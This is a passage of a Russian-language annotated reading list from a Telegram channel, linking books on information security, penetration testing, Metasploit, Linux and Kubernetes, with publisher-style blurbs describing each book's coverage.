# [S.E.Book.](https://t.me/S_E_Book) Список литературы, статей, различных документов tg канала @S_E_Book. Список будет дополняться каждую неделю, по мере нахождения полезного материала. ## Меню: - [Книги по информационной безопасности на Русском языке.](#Информационная-безопасность-RU) - [Книги по информационной безопасности на Английском языке.](#Информационная-безопасность-Eng) - [Информационная безопасность. Дополнительный полезный материал: софт, ресурсы, подборки, мануалы, статьи и многое другое....](#Информационная-безопасность-Manual) - [Сетевые технологии. Администрирование, Книги и курсы на Русском языке.](#Сетевые-технологии-RU) - [Сетевые технологии. Администрирование, Книги и курсы на Английском языке.](#Сетевые-технологии-Eng) - [Социальная Инженерия. Книги на Русском языке.](#Social-Engineering-RU) - [Социальная Инженерия. Книги на Английском языке.](#Social-Engineering-Eng) - [Психология, НЛП, Профайлинг.](#Психология-НЛП-Профайлинг) - [Программирование. Книги по программированию на Русском языке.](#Программирование-RU) - [Программирование. Книги по программированию на Английском языке.](#Программирование-Eng) - [Книги, видео, полезный материал на тему Arduino. На Русском языке.](#Arduino-Ru) - [Книги, видео, полезный материал на тему Arduino. На Английском языке.](#Arduino-Eng) - [Reverse Engineering.](#Reverse-Eng) - [Bug Hunting.](#Bug-Hunting-Eng) - [Malware analysis. Книги и курсы на Русском языке.](#Malware-analysis-Ru) - [Malware analysis. Книги и курсы на Английском языке.](#Malware-analysis-Eng) - [CTF.](#CTF) - [Android. Безопасность, приложения, книги, статьи.](#Android) - [Termux.](#Termux) - [iOS. Безопасность, приложения, книги, статьи.](#iOS) - [Материал на тему анонимности и безопасности в сети и в реальной жизни.](#Анонимность-и-безопасность) - [OSINT. Книги, ресурсы, полезный материал.](#OSINT) - [Материал для изучения Английского языка.](#Изучение-английского-языка) - [Honeypots.](#Honeypots) - [Форензика. Инструменты, книги, статьи, полезные ресурсы. RU \ Eng.](#Форензика) - [Сторонняя литература.](#Сторонняя-литература) - [Cheat Sheet.](#CheatSheet) - [Прочее.Ресурсы и статьи.](#Прочее) ## Информационная безопасность RU Книги по информационной безопасности на Русском языке. * [С.А.Бабин.Инструментарий хакера.](https://t.me/S_E_Book/71) - В данной книге приведено множество примеров взлома и сокрытия следов: перехват паролей, атаки на Wi-Fi-роутеры, подмена MAC-адресов, способы оставаться невидимым в Интернете. Книга хорошо зайдет всем начинающим, будщим специалистам информационной безопасности. * [Пошаговое руководство по внедрению эксплойта в ядро Linux.](https://t.me/S_E_Book/291) - Это руководство для Вас будет как путеводитель по ядру в Linux, сопровождаемый практическим примером. Написание эксплоитов дает хорошее понимание схемы функционирования ядра. Кроме того, в данном руководстве есть различные отладочные техники, инструменты, наиболее распространенные подводные камни и методы решения возникающих проблем. Уязвимость CVE‑2017‑11176, именуемая также «mq_notify: double sock_put()», исправлена в большинстве дистрибутивов в середине 2017 года. В этом цикле рассматривается ядро версии 2.6.32.x, однако уязвимость присутствует во всех ядрах вплоть до версии 4.11.9. С одной стороны, рассматриваемая версия ядра достаточно старая, с другой – используется во множестве систем, а рассматриваемый код более легок для понимания. * [Книга о ядре Linux. linux-insides.](https://t.me/S_E_Book/291) - Путеводитель по ядру в Linux. * [Шоттс Уильям. Командная строка Linux. Полное руководство.](https://t.me/S_E_Book/303) - Уильям Шоттс знакомит вас с истинной философией Linux. Вы уже знакомы с Linux и настала пора нырнуть поглубже и познакомиться с возможностями командной строки. Командная строка - всегда с вами, от первого знакомства до написания полноценных программ в Bash - самой популярной оболочке Linux . Познакомьтесь с основами навигации по файловой системе, настройки среды, последовательностями команд, поиском по шаблону и многим другим. * [Linux от новичка к профессионалу.](https://t.me/S_E_Book/399) - Описание и установка популярных дистрибутивов (Fedora, openSUSE, CentOS, Unbuntu), Работа с файлами через командную строку. Введение в Bash, Управление пользователями и группами, Настройка WiFi и VPN, Управление ядром, Работа с VirtualBox. * [Unbuntu Linux с нуля.](https://t.me/S_E_Book/399) - Установка и первый запуск, Всё про файлы и файловую систему, Работа с консолью. Полезные команды терминала, Драйверы и стороннее оборудование, Установка ПО, запуск Windows-приложений, Службы, сервисы и демоны. Управление процессами, Подключение к удаленному рабочему столу, Виртуальные машины. * [Тестирование на проникновение с помощью Kali Linix 2.0.](test) - Встроенные инструменты Kali и базы эксплойтов, Пентестинг сетей, сниффинг, перехват данных, дополнительный инструментарий, Стресс-тесты систем, Поиск уязвимостей веб-приложений, Metasploit, WPscanner, Взлом ОС, Взлом паролей. Брутфорс и атаки по словарю. * [Linux глазами Хакера.](https://t.me/S_E_Book/400) - Управление доступом, конфигурация firewall, Шифрование и протокол SSH, Конфигурация веб-сервера, электронной почты и интернет шлюза, Безопасная передача данных и резервное копирование, Мониторинг работы. * [Bash и кибербезопасность. Атака, защита и анализ из командной строки.](https://t.me/S_E_Book/936) - Командная строка может стать идеальным инструментом для обеспечения кибербезопасности. Невероятная гибкость и абсолютная доступность превращают стандартный интерфейс командной строки (CLI) в фундаментальное решение, если у вас есть соответствующий опыт. Авторы Пол Тронкон и Карл Олбинг рассказывают об инструментах и хитростях командной строки, помогающих собирать данные при упреждающей защите, анализировать логи и отслеживать состояние сетей. Пентестеры узнают, как проводить атаки, используя колоссальный функционал, встроенный практически в любую версию Linux. * [Фленов Михаил. Linux глазами Хакера. 5 Издание. 2019 год.](https://t.me/S_E_Book/186) - Рассмотрены вопросы настройки ОС Linux на максимальную производитель-ность и безопасность. Описано базовое администрирование и управление доступом, настройка Firewall, файлообменный сервер, WEB-, FTP- и Proxy-сервера, программы для доставки электронной почты, службы DNS, а также политика мониторинга системы и архивирование данных. * [Эриксон Д. - Хакинг. Искусство эксплойта. 2-е издание на Русском.](https://t.me/S_E_Book/192) - Автор книги не учит применять известные эксплойты, а объясняет их работу и внутреннюю сущность. Вначале читатель знакомится с основами программирования на C, ассемблере и языке командной оболочки, учится исследовать регистры процессора. А усвоив материал, можно приступать к хагингу – перезаписывать память с помощью переполнения буфера, получать доступ к удаленному серверу, скрывая свое присутствие, и перехватывать соединения TCP. Изучив эти методы, можно взламывать зашифрованный трафик беспроводных сетей, успешно преодолевая системы защиты и обнаружения вторжений. * [Милосердов А. Тестирование на проникновение с помощью Kali Linux 2.0.](https://t.me/S_E_Book/225) - Kali Linux является передовым Linux дистрибутивом для проведения тестирования на проникновение и аудита безопасности. Информация в данной книге предназначена для ознакомления или тестирования на проникновение собственных сетей. Для тестирования сетей третьих лиц, получите письменное разрешение. “Тестирование на проникновение (жарг. Пентест) — метод оценки безопасности компьютерных систем или сетей средствами моделирования атаки злоумышленника.” – WiKi. Вся ответственность за реализацию действий, описанных в книге, лежит на вас. Помните, что за неправомерные действия предусмотрена ответственность, вплоть до уголовной. Книга состоит из 8 частей, в которые входят 62 главы. Все подробно рассказывается с использованием примеров. В книге используется самая актуальная информация на сегодняшний день. * [Kali Linux. Тестирование на проникновение и безопасность.](https://t.me/S_E_Book/455) - 4-е издание Kali Linux 2018: Assuring Security by Penetration Testing предназначено для этических хакеров, пентестеров и специалистов по IT-безопасности. От читателя требуются базовые знания операционных систем Windows и Linux. Знания из области информационной безопасности будут плюсом и помогут вам лучше понять изложенный в книге материал. * [Прутяну Э. Как стать хакером.](https://t.me/S_E_Book/498) - Чтобы предупредить хакерскую атаку, надо понимать, как мыслит и действует злоумышленник. Книга посвящена защите веб-приложений от вредоносных воздействий. Вы узнаете, какими уязвимостями чаще всего пользуются хакеры, как выявить бреши в системе защиты и как свести к минимуму риски взлома. * [Мошенничество в платежной сфере. Бизнес-энциклопедия.](https://t.me/S_E_Book/567) - Активное использование информационных технологий в платежной сфере привело к появлению разнообразных специфических форм мошенничества, основанных на применении достижений современных ИТ. Мошенничество с банковскими картами, электронными деньгами и при обслуживании клиентов в системах дистанционного банковского обслуживания; способы борьбы с противоправными действиями злоумышленников; вопросы нормативного регулирования - эти и многие другие аспекты данной проблематики рассматриваются в бизнес-энциклопедии "Мошенничество в платежной сфере". Все материалы для книги подготовлены практикующими специалистами - экспертами в финансово-банковской сфере. * [Масалков Андрей Сергеевич. Особенности киберпреступлений. Инструменты нападения и защита информации.](https://t.me/S_E_Book/569) - Материал книги помогает разобраться в том, что обычно скрывается за терминами и шаблонными фразами "взлом электронной почты", "кибершпионаж" и "фишинг". Автор старался показать информационную безопасность как поле битвы с трех сторон: со стороны преступного сообщества, использующего информационные технологии, со стороны законодательства и правоохранительной системы и со стороны атакуемого. * [Кибербезопасность: стратегии атак и обороны.](https://t.me/S_E_Book/1027) - Когда ландшафт угроз постоянно расширяется, возникает необходимость иметь надежную стратегию в области безопасности, т.е. усиление защиты, обнаружения и реагирования. На протяжении этой книги вы будете изучать методы атак и шаблоны, позволяющие распознавать аномальное поведение в вашей организации, используя тактические приемы Синей команды. Вы также научитесь методам сбора данных об эксплуатации, выявления рисков и продемонстрируете влияние на стратегии Red Team и Blue Team. * [Справочник законодательства РФ в области Информационной Безопасности.](https://t.me/S_E_Book/145) - Все специалисты по информационной безопасности рано или поздно сталкиваются с вопросами законодательного регулирования своей деятельности. Первой проблемой при этом обычно является поиск документов, где прописаны те или иные требования. Данный справочник призван помочь в этой беде и содержит подборку ссылок на основные законодательные и нормативно-правовые акты, регламентирующие применение информационных технологий и обеспечение информационной безопасности в Российской Федерации. * [Руководство пользователя Metasploit Pro.](https://t.me/S_E_Book/94) - Руководство пользователя Metasploit Pro. Переведено на Русский язык. * [Осваиваем Kubernetes. Оркестрация контейнерных архитектур. Сайфан Джиджи.](https://t.me/S_E_Book/1251) - Книга начинается с изучения основ Kubernetes, архитектуры и компоновки этой системы. Вы научитесь создавать микросервисы с сохранением состояния, ознакомитесь с такими продвинутыми возможностями, как горизонтальное автомасштабирование подов, выкатывание обновлений, квотирование ресурсов, обустроите долговременное хранилище на бэкенде. На реальных примерах вы исследуете возможности сетевой конфигурации, подключение и настройку плагинов. ## Информационная безопасность Eng Книги по информационной безопасности на Английском языке. * [PowerShell for Sysadmins: Workflow Automation Made Easy.](https://t.me/S_E_Book/1250) - PowerShell® is both a scripting language and an administrative shell that lets you control and automate nearly every aspect of IT. In PowerShell for Sysadmins, five-time Microsoft® MVP "Adam the Automator" Bertram shows you how to use PowerShell to manage and automate your desktop and server environments so that you can head out for an early lunch. * [Mastering Windows Security and Hardening.](https://t.me/S_E_Book/1237) - Mastering Windows Security and Hardening is a detailed guide that helps you gain expertise when implementing efficient security measures and creating robust defense solutions. * [Hash Crack: Password Cracking Manual (v3).](https://t.me/S_E_Book/1201) - The Hash Crack: Password Cracking Manual v3 is an expanded reference guide for password recovery (cracking) methods, tools, and analysis techniques. A compilation of basic and advanced techniques to assist penetration testers and network security professionals evaluate their organization's posture. The Hash Crack manual contains syntax and examples for the most popular cracking and analysis tools and will save you hours of research looking up tool usage. It also includes basic cracking knowledge and methodologies every security professional should know when dealing with password attack capabilities. Hash Crack contains all the tables, commands, online resources, and more to complete your cracking security kit. This version expands on techniques to extract hashes from a myriad of operating systems, devices, data, files, and images. Lastly, it contains updated tool usage and syntax for the most popular cracking tools. * [Gray Hat Hacking: The Ethical Hacker's Handbook, Fifth Edition.](https://t.me/S_E_Book/1204) - Fortify your network and avert digital catastrophe with proven strategies from a team of security experts. Completely updated and featuring 13 new chapters, Gray Hat Hacking, The Ethical Hacker’s Handbook, Fifth Edition explains the enemy’s current weapons, skills, and tactics and offers field-tested remedies, case studies, and ready-to-try testing labs. Find out how hackers gain access, overtake network devices, script and inject malicious code, and plunder Web applications and browsers. Android-based exploits, reverse engineering techniques, and cyber law are thoroughly covered in this state-of-the-art resource. And the new topic of exploiting the Internet of things is introduced in this edition. * [Web Penetration Testing with Kali Linux - Third Edition.](https://t.me/S_E_Book/1206) - Web Penetration Testing with Kali Linux - Third Edition shows you how to set up a lab, helps you understand the nature and mechanics of attacking websites, and explains classical attacks in great depth. This edition is heavily updated for the latest Kali Linux changes and the most recent attacks. Kali Linux shines when it comes to client-side attacks and fuzzing in particular. * [Mastering Linux Security and Hardening.](https://t.me/S_E_Book/1210) - From creating networks and servers to automating the entire working environment, Linux has been extremely popular with system administrators for the last couple of decades. However, security has always been a major concern. With limited resources available in the Linux security domain, this book will be an invaluable guide in helping you get your Linux systems properly secured. * [ Hands-On Security in DevOps.](https://t.me/S_E_Book/1213) - DevOps has provided speed and quality benefits with continuous development and deployment methods, but it does not guarantee the security of an entire organization. Hands-On Security in DevOps shows you how to adopt DevOps techniques to continuously improve your organization’s security at every level, rather than just focusing on protecting your infrastructure. * [Kali Linux - An Ethical Hacker's Cookbook.](https://t.me/S_E_Book/1193) - This ethical hacking book starts by helping you to install and configure Kali Linux. You'll learn how to plan attack strategies and perform web application exploitation using tools such as Burp and JexBoss. As you progress, you'll get to grips with using Metasploit, Sparta, and Wireshark for performing network exploitation. The book will also delve into the technique of carrying out wireless and password attacks using Patator, John the Ripper, and airoscript-ng, and then focus on a wide range of tools for forensic investigations and incident response mechanisms. In concluding chapters, you'll learn to create an optimum pentest report that covers structured details of the pentesting engagement. * [Linux Basics for Hackers.](https://t.me/S_E_Book/1194) - This practical, tutorial-style book uses the Kali Linux distribution to teach Linux basics with a focus on how hackers would use them. Topics include Linux command line basics, filesystems, networking, BASH basics, package management, logging, and the Linux kernel and drivers. * [The Internet in Everything.](https://t.me/S_E_Book/1186) - The Internet has leapt from human-facing display screens into the material objects all around us. In this so-called Internet of things—connecting everything from cars to cardiac monitors to home appliances—there is no longer a meaningful distinction between physical and virtual worlds. Everything is connected. The social and economic benefits are tremendous, but there is a downside: an outage in cyberspace can result not only in loss of communication but also potentially in loss of life. * [The HACKer's HARDWARE TOOLKit.](https://t.me/S_E_Book/105) - Очень занимательная книга по хакерскому железу с описанием, примерной ценой и небольшой спецификой применения. * [CISSP All-in-One Exam Guide.](https://t.me/S_E_Book/112) - Get complete coverage of the latest release of the Certified Information Systems Security Professional (CISSP) exam inside this comprehensive, fully updated resource. Written by the leading expert in IT security certification and training, this authoritative guide covers all 10 CISSP exam domains developed by the International Information Systems Security Certification Consortium (ISC2). You'll find learning objectives at the beginning of each chapter, exam tips, practice exam questions, and in-depth explanations. Designed to help you pass the CISSP exam with ease, this definitive volume also serves as an essential on-the-job reference * [Hacking: Hacking Practical Guide for Beginners.](https://t.me/S_E_Book/118) - Hacking. In the digital age the word conjures up images of individuals in darkened basements, breaking into multi-national company’s computer systems, leaking sensitive information and living on takeaways – never seeing the light of day. But reality is very different and there are many, who are novices at hacking, living perfectly everyday lives, who are eager to learn more on the subject. * [Automating Open Source Intelligence: Algorithms for OSINT.](https://t.me/S_E_Book/120) - Книга рассказывает об эффективном извлечении данных из открытых источников. В 2019 OSINT имеет огромный потенциал для борьбы с преступностью и социальных исследований, а в этой книге представлены последние достижения в области интеллектуального анализа текста, сканирования в сети и других алгоритмов, которые привели к успехам в методах, которые могут запросто автоматизировать этот процесс. * [Mastering Kali Linux Wireless Pentesting.](https://t.me/S_E_Book/690) - If you are an intermediate-level wireless security consultant in Kali Linux and want to be the go-to person for Kali Linux wireless security in your organisation, then this is the book for you. Basic understanding of the core Kali Linux concepts is expected. * [Kali Linux Pentesting Cookbook.](https://t.me/S_E_Book/692) - Starting from the setup of a testing laboratory, this book will give you the skills you need to cover every stage of a penetration test: from gathering information about the system and the application to identifying vulnerabilities through manual testing and the use of vulnerability scanners to both basic and advanced exploitation techniques that may lead to a full system compromise. Finally, we will put this into the context of OWASP and the top 10 web application vulnerabilities you are most likely to encounter, equipping you with the ability to combat them effectively. By the end of the book, you will have the required skills to identify, exploit, and prevent web application vulnerabilities. * [Metasploit Penetration Testing Cookbook, Second Edition.](https://t.me/S_E_Book/694) - The book starts with the basics, such as gathering information about your target, and then develops to cover advanced topics like building your own framework scripts and modules. The book goes deep into operating-systems-based penetration testing techniques and moves ahead with client-based exploitation methodologies. In the post-exploitation phase, it covers meterpreter, antivirus bypass, ruby wonders, exploit building, porting exploits to the framework, and penetration testing, while dealing with VOIP, wireless networks, and cloud computing. This book will help readers to think from a hacker's perspective to dig out the flaws in target networks and also to leverage the powers of Metasploit to compromise them. It will take your penetration skills to the next level. * [Mastering Metasploit.](https://t.me/S_E_Book/696) - The Metasploit framework has been around for a number of years and is one of the most widely used tools for carrying out penetration testing on various services. This book is a hands-on guide to penetration testing using Metasploit and covers its complete development. It will help you clearly understand the creation process of various exploits and modules and develop approaches to writing custom functionalities into the Metasploit framework. This book covers a number of techniques and methodologies that will help you learn and master the Metasploit framework. You will also explore approaches to carrying out advanced penetration testing in highly secured environments, and the book's hands-on approach will help you understand everything you need to know about Metasploit. * [Learn Kali Linux 2019: Perform powerful penetration testing using Kali Linux, Metasploit, Nessus, Nmap, and Wireshark.](https://t.me/S_E_Book/708) - The current rise in hacking and security breaches makes it more important than ever to effectively pentest your environment, ensuring endpoint protection. This book will take you through the latest version of Kali Linux and help you use various tools and techniques to efficiently deal with crucial security aspects. * [Mastering Active Directory.](https://t.me/S_E_Book/717) - Active Directory is a centralized and standardized system that automates networked management of user data, security, and distributed resources and enables interoperation with other directories. If you are aware of Active Directory basics and want to gain expertise in it, this book is perfect for you. * [Nmap 6: Network exploration and security auditing Cookbook.](https://t.me/S_E_Book/719) - This book is for any security consultant, administrator or enthusiast looking to learn how to use and master Nmap and the Nmap Scripting Engine. * [Mastering Kali Linux for Advanced Penetration Testing Paperback.](https://t.me/S_E_Book/721) - This book will take you, as a tester, through the reconnaissance, exploitation, and post-exploitation activities used by penetration testers and hackers. After learning the hands-on techniques to perform an effective and covert attack, specific routes to the target will be examined, including bypassing physical security. You will also get to grips with concepts such as social engineering, attacking wireless networks, web services, and remote access connections. Finally, you will focus on the most vulnerable part of the network—directly attacking the end user. * [Windows Server 2019 Automation with PowerShell Cookbook.](https://t.me/S_E_Book/739) - You'll begin by creating a PowerShell administrative environment that features updated versions of PowerShell, the Windows Management Framework, .NET Framework, and third-party modules. You'll then learn how you can use PowerShell to set up and configure Windows Server 2019 networking and manage objects in the Active Directory (AD) environment. This PowerShell cookbook will also guide you in setting up a host to use and deploy containers. Further along, you'll be able to implement different mechanisms to achieve Desired State Configuration. The book will then help you get to grips with Azure infrastructure and set up virtual machines (VMs), websites, and shared files on Azure. In the concluding chapters, you'll be able to deploy powerful tools to diagnose and resolve issues with Windows Server 2019. * [Practical Linux Security Cookbook.](https://t.me/S_E_Book/757) - With a step-by-step recipe approach, the book starts by introducing you to various threats to Linux systems. Then, this book will walk you through customizing the Linux kernel and securing local files. Next, you will move on to managing user authentication both locally and remotely and mitigating network attacks. Later, you will learn about application security and kernel vulnerabilities. You will also learn about patching Bash vulnerability, packet filtering, handling incidents, and monitoring system logs. Finally, you will learn about auditing using system services and performing vulnerability scanning on Linux. * [Network Scanning Cookbook.](https://t.me/S_E_Book/759) - Network Scanning Cookbook contains recipes for configuring these tools in your infrastructure that get you started with scanning ports, services, and devices in your network. As you progress through the chapters, you will learn how to carry out various key scanning tasks, such as firewall detection, OS detection, and access management, and will look at problems related to vulnerability scanning and exploitation in the network. The book also contains recipes for assessing remote services and the security risks that they bring to a network infrastructure. * [Mastering the Nmap Scripting Engine.](https://t.me/S_E_Book/765) - This book will teach you everything you need to know to master the art of developing NSE scripts. The book starts by covering the fundamental concepts of Lua programming and reviews the syntax and structure of NSE scripts. After that, it covers the most important features of NSE. It jumps right into coding practical scripts and explains how to use the Nmap API and the available NSE libraries to produce robust scripts. Finally, the book covers output formatting, string handling, network I/O, parallelism, and vulnerability exploitation. * [Metasploit Bootcamp.](https://t.me/S_E_Book/772) - The Metasploit Framework is widely popular among cybersecurity professionals for detecting vulnerabilities and developing defense techniques. This book covers the framework comprehensively, helping you learn systematically with exercises after each chapter. * [Cybersecurity – Attack and Defense Strategies.](https://t.me/S_E_Book/775) - In this book, you'll start by exploring the concept of security posture before moving on to Red Team tactics, where you will learn the basic syntax for Windows and Linux tools that are commonly used to perform the necessary operations. You will then get hands-on with using Red Team techniques with powerful tools such as Python and PowerShell, which will enable you to discover vulnerabilities in your system and exploit them. As you progress, you'll learn how a system is usually compromised by adversaries and how they hack a user's identity, along with the different tools used by the Red Team to find vulnerabilities, protect the user's identity and prevent credential theft. Next, you'll focus on the defense strategies followed by the Blue Team to enhance the overall security of a system. You will learn how to ensure that there are security controls in each network layer, and carry out the recovery process of a compromised system. Finally, you'll get to grips with creating a vulnerability management strategy and discover different techniques for manual log analysis. * [Burp Suite Cookbook.](https://t.me/S_E_Book/788) - The book's first few sections will help you understand how to uncover security flaws with various test cases for complex environments. After you've configured Burp for your environment, you will use Burp tools such as Spider, Scanner, Intruder, Repeater, and Decoder, among others, to resolve specific problems faced by pentesters. You'll also be able to work with Burp's various modes, in addition to performing operations on the web. Toward the concluding chapters, you'll explore recipes that target specific test scenarios and learn how to resolve them using best practices. * [The Hacker Playbook 2: Practical Guide To Penetration Testing.](https://t.me/S_E_Book/797) - This second version of The Hacker Playbook takes all the best "plays" from the original book and incorporates the latest attacks, tools, and lessons learned. Double the content compared to its predecessor, this guide further outlines building a lab, walks through test cases for attacks, and provides more customized code. * [The Hacker Playbook 3: Practical Guide To Penetration Testing.](https://t.me/S_E_Book/799) - The main purpose of this book is to answer questions as to why things are still broken. For instance, with all the different security products, secure code reviews, defense in depth, and penetration testing requirements, how are we still seeing massive security breaches happening to major corporations and governments? The real question we need to ask ourselves is, are all the safeguards we are putting in place working? This is what The Hacker Playbook 3 - Red Team Edition is all about. * [Blue Team Field Manual (BTFM) (RTFM).](https://t.me/S_E_Book/803) - Blue Team Field Manual (BTFM) is a Cyber Security Incident Response Guide that aligns with the NIST Cybersecurity Framework consisting of the five core functions of Identify, Protect, Detect, Respond, and Recover by providing the tactical steps to follow and commands to use when preparing for, working through and recovering from a Cyber Security Incident. * [Rtfm: Red Team Field Manual.](https://t.me/S_E_Book/806) - The Red Team Field Manual (RTFM) is a no fluff, but thorough reference guide for serious Red Team members who routinely find themselves on a mission without Google or the time to scan through a man page. The RTFM contains the basic syntax for commonly used Linux and Windows command line tools, but it also encapsulates unique use cases for powerful tools such as Python and Windows PowerShell. The RTFM will repeatedly save you time looking up the hard to remember Windows nuances such as Windows wmic and dsquery command line tools, key registry values, scheduled tasks syntax, startup locations and Windows scripting. More importantly, it should teach you some new red team techniques. * [The Complete Metasploit Guide.](https://t.me/S_E_Book/824) - This Learning Path introduces you to the basic functionalities and applications of Metasploit. Throughout this book, you'll learn different techniques for programming Metasploit modules to validate services such as databases, fingerprinting, and scanning. You'll get to grips with post exploitation and write quick scripts to gather information from exploited systems. As you progress, you'll delve into real-world scenarios where performing penetration tests are a challenge. With the help of these case studies, you'll explore client-side attacks using Metasploit and a variety of scripts built on the Metasploit Framework. * [Quick Start Guide to Penetration Testing: With NMAP, OpenVAS and Metasploit.](https://t.me/S_E_Book/826) - Благодаря этой книге, мы сможем с легкостью работать с NMAP, OpenVAS и Metasploit и выясним, как NMAP, OpenVAS и Metasploit могут быть интегрированы друг с другом для большей гибкости и эффективности. Будем работать с NMAP и ZENMAP. По итогу, изучения данной книги, будет тестирование системы в котором ты применишь все навыки полученные после прочтения данной книги. * [Metasploit Penetration Testing Cookbook.](https://t.me/S_E_Book/829) - Third Edition: Evade antiviruses, bypass firewalls, and exploit complex environments with the most widely used penetration testing framework (English Edition) * [Improving your Penetration Testing Skills.](https://t.me/S_E_Book/878) - This Learning Path starts with an in-depth explanation of what hacking and penetration testing is. You'll gain a deep understanding of classical SQL and command injection flaws, and discover ways to exploit these flaws to secure your system. You'll also learn how to create and customize payloads to evade antivirus software and bypass an organization's defenses. Whether it's exploiting server vulnerabilities and attacking client systems, or compromising mobile phones and installing backdoors, this Learning Path will guide you through all this and more to improve your defense against online attacks. * [Red Team Development and Operations: A practical guide.](https://t.me/S_E_Book/900) - This book is the culmination of years of experience in the information technology and cybersecurity field. Components of this book have existed as rough notes, ideas, informal and formal processes developed and adopted by the authors as they led and executed red team engagements over many years. The concepts described in this book have been used to successfully plan, deliver, and perform professional red team engagements of all sizes and complexities. Some of these concepts were loosely documented and integrated into red team management processes, and much was kept as tribal knowledge. One of the first formal attempts to capture this information was the SANS SEC564 Red Team Operation and Threat Emulation course. * [Red Team: How to Succeed By Thinking Like the Enemy.](https://t.me/S_E_Book/902) - Essential reading for business leaders and policymakers, an in-depth investigation of red teaming, the practice of inhabiting the perspective of potential competitors to gain a strategic advantage. * [Metasploit Penetration Testing Recipes "Video".](https://t.me/S_E_Book/903) - В этих видео подробно разобраны: основы Metasploit, этапы тестирования на проникновения, создание собственных модулей, атаки, обход антивирусов, файрволов, использование уязвимых ОС и многое другое. * [Hands-On Red Team Tactics.](https://t.me/S_E_Book/910) - Cybersecurity red teaming is used to enhance security by performing simulated attacks on an organization to detect network and system vulnerabilities. This book starts with an overview of pentesting and red teaming, and introduces you to some of the latest pentesting tools. You'll then explore Metasploit and get to grips with Armitage. Once you've studied the fundamentals, you'll learn how to use Cobalt Strike and set up its team server. * [Mastering Linux Security and Hardening.](https://t.me/S_E_Book/913) - The book begins by explaining how to secure your Linux system with the help of different security techniques such as SSH hardening, network service detection, setting up firewalls, encrypting file systems, protecting user accounts, and authentication processes. As you progress, you will get to grips with advanced Linux permissions, access control, and special modes to further enhance security while setting up your system. Finally, you will gain insights into best practices and troubleshooting techniques. * [Learning Pentesting for Android Devices.](https://t.me/S_E_Book/916) - Android is the most popular mobile smartphone operating system at present, with over a million applications. Every day hundreds of applications are published to the PlayStore, which users from all over the world download and use. Often, these applications have serious security weaknesses in them, which could lead an attacker to exploit the application and get access to sensitive information. This is where penetration testing comes into play to check for various vulnerabilities. * [Cybersecurity Attacks – Red Team Strategies.](https://t.me/S_E_Book/925) - The book starts by guiding you through establishing, managing, and measuring a red team program, including effective ways for sharing results and findings to raise awareness. Gradually, you'll learn about progressive operations such as cryptocurrency mining, focused privacy testing, targeting telemetry, and even blue team tooling. Later, you'll discover knowledge graphs and how to build them, then become well-versed with basic to advanced techniques related to hunting for credentials, and learn to automate Microsoft Office and browsers to your advantage. Finally, you'll get to grips with protecting assets using decoys, auditing, and alerting with examples for major operating systems. * [BackTrack 5 Wireless Penetration Testing Beginner’s Guide.](https://t.me/S_E_Book/933) - Written in Packt’s Beginner’s Guide format, you can easily grasp the concepts and understand the techniques to perform wireless attacks in your lab. Every new attack is described in the form of a lab exercise with rich illustrations of all the steps associated. You will practically implement various attacks as you go along. If you are an IT security professional or a security consultant who wants to get started with wireless testing with Backtrack, or just plain inquisitive about wireless security and hacking, then this book is for you. The book assumes that you have familiarity with Backtrack and basic wireless concepts. * [BackTrack - Testing Wireless Network Security.](https://t.me/S_E_Book/937) - BackTrack - Testing Wireless Network Security looks at what tools hackers use and shows you how to defend yourself against them. Taking you from no prior knowledge all the way to a fully secure environment, this guide provides useful tips every step of the way. Learn how to select a wireless card to work with the Backtrack tools, run spectrum analysis scans using kismet, set up test networks, and perform attacks against wireless networks. Use the tools aircrack-ng and airodump-ng to crack the wireless encryption used on the network. * [Metasploit 5.0 for Beginners. 2020.](https://t.me/S_E_Book/944) - Securing an IT environment can be challenging, however, effective penetration testing and threat identification can make all the difference. This book will help you learn how to use the Metasploit Framework optimally for comprehensive penetration testing. * [Practical Web Penetration Testing.](https://t.me/S_E_Book/962) - Companies all over the world want to hire professionals dedicated to application security. Practical Web Penetration Testing focuses on this very trend, teaching you how to conduct application security testing using real-life scenarios. * [Learn Penetration Testing.](https://t.me/S_E_Book/971) - Sending information via the internet is not entirely private, as evidenced by the rise in hacking, malware attacks, and security threats. With the help of this book, you'll learn crucial penetration testing techniques to help you evaluate enterprise defenses. * [Web Penetration Testing.](https://t.me/S_E_Book/973) - Understanding the CSRF Vulnerability (A Beginner’s Guide); Cross-Site Scripting ExploitationComprehensive Guide on Cross-Site Scripting (XSS);Comprehensive Guide on Unrestricted File Upload;Comprehensive Guide on Open Redirect;Comprehensive Guide to Remote File Inclusion (RFI);Comprehensive Guide on HTML Injection;Comprehensive Guide on Path Traversal; * [Hands-On Penetration Testing on Windows.](https://t.me/S_E_Book/1010) - In this book, you'll learn advanced techniques to attack Windows environments from the indispensable toolkit that is Kali Linux. We'll work through core network hacking concepts and advanced Windows exploitation techniques, such as stack and heap overflows, precision heap spraying, and kernel exploitation, using coding principles that allow you to leverage powerful Python scripts and shellcode. * [Advanced Penetration Testing.](https://t.me/S_E_Book/1014) - This book integrates social engineering, programming, and vulnerability exploits into a multidisciplinary approach for targeting and compromising high security environments. From discovering and creating attack vectors, and moving unseen through a target enterprise, to establishing command and exfiltrating data―even from organizations without a direct Internet connection―this guide contains the crucial techniques that provide a more accurate picture of your system's defense. Custom coding examples use VBA, Windows Scripting Host, C, Java, JavaScript, Flash, and more, with coverage of standard library applications and the use of scanning tools to bypass common defensive measures. * [Kubernetes Cookbook: Practical solutions to container orchestration.](https://t.me/S_E_Book/1016) - Kubernetes is an open source orchestration platform to manage containers in a cluster environment. With Kubernetes, you can configure and deploy containerized applications easily. This book gives you a quick brush up on how Kubernetes works with containers, and an overview of main Kubernetes concepts, such as Pods, Deployments, Services and etc. * [Mastering Kubernetes: Large scale container deployment and management.](https://t.me/S_E_Book/1021) - This book mainly focuses on the advanced management of Kubernetes clusters. It covers problems that arise when you start using container orchestration in production. We start by giving you an overview of the guiding principles in Kubernetes design and show you the best practises in the fields of security, high availability, and cluster federation. * [Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats.](https://t.me/S_E_Book/417) - Ценнейший сборник информации о руткитах и буткитах, алгоритмах их работы, особенностях реализации в ОС, методах детектирования и противодействия. * [Kali Linux 2018.](https://t.me/S_E_Book/821) - Windows Penetration Testing: Conduct network testing, surveillance, and pen testing on MS Windows using Kali Linux 2018, 2nd Edition. * [Learning Kubernetes Video.](https://t.me/S_E_Book/1223) - Kubernetes is a market-leading cloud platform technology and is the best solution over other cloud platforms. Further, almost all of the major cloud infrastructure providers, such as AWS, Azure, and Google, offer hosted versions of 